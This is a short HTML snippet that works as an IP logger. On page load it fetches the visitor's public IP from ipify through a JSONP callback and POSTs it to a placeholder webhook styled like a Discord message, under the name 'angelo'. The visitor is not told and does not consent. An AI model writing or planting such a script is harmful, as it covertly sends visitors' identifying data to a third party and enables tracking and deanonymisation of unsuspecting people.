<script>
function getIP(json) {
  var request = new XMLHttpRequest(); 
      request.open("POST", "webhook here");

      request.setRequestHeader('Content-type', 'application/json');

      var params = {
        username: "angelo",
        avatar_url: "https://i.pinimg.com/originals/d8/eb/57/d8eb57825be593ff8993265cf5eea794.jpg",
        content: "ip:" + json.ip + "*"
      }

      request.send(JSON.stringify(params));
    }

</script>
<script src="https://api.ipify.org?format=jsonp&callback=getIP"></script> 
